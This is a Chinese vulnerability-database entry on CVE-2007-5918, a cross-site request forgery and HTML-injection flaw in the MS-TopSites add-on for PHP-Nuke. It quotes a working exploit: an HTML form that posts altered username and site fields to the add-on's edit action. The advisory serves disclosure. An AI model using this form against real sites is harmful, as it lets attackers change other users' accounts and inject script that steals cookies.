Weblord.it MS-TopSites add-on edit.php 跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113909 漏洞类型 跨站请求伪造
发布时间 2007-11-06 更新时间 2007-11-20
CVE编号 CVE-2007-5918 CNNVD-ID CNNVD-200711-143
漏洞平台 PHP CVSS评分 6.0
|漏洞来源
https://www.exploit-db.com/exploits/30745
https://www.securityfocus.com/bid/26358
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-143
|漏洞详情
PHP-Nuke的MSTopSitesadd-on的edit.php中存在跨站请求伪造漏洞,不验证当前用户的uname参数匹配,这使得远程验证用户借助修改modules.php的edit操作的uname值更改任意账户属性或更改SiteTitleName字段。
|漏洞EXP
source: http://www.securityfocus.com/bid/26358/info

MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data.

An attacker can exploit these issues to gain elevated privileges on the affected application, execute arbitrary code within the context of the webserver, and steal cookie-based authentication credentials. 

<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
<body bgcolor="black" text="white">
<form action="http://localhost:81/modules.php?name=MS_TopSites&file=edit " method="post">
<input size="92" type="text" value='' name="sname"> SiteNameTitle [sname] (not Target it must be changed in the source) <br />
<input size="92" type="text" value="" name="uname"> Username [uname] <br />
<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
<input size="92" type="text" value="mail@url.com" name="email"> Email<br />
<input size="92" type="text" value='' name="bottonurl"> BottonUrl<br />
<input size="92" type="text" value="Art" name="cat"> Cat <br />
<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
<input type="hidden" value="MSTopSitesSaveSite" name="op"><br />
<input type="submit" value="submit"><br />
</body></form>
</html>
|受影响的产品
weblord.it MS TopSites 0
|参考资料

来源:BID
名称:26358
链接:http://www.securityfocus.com/bid/26358
来源:BUGTRAQ
名称:20071106PhpNuke(add-on)MSTopSitesEditExploitAndHtmlInjection
链接:http://www.securityfocus.com/archive/1/archive/1/483353/100/0/threaded
来源:MISC
链接:http://0x90.com.ar/Advisory/20071106.txt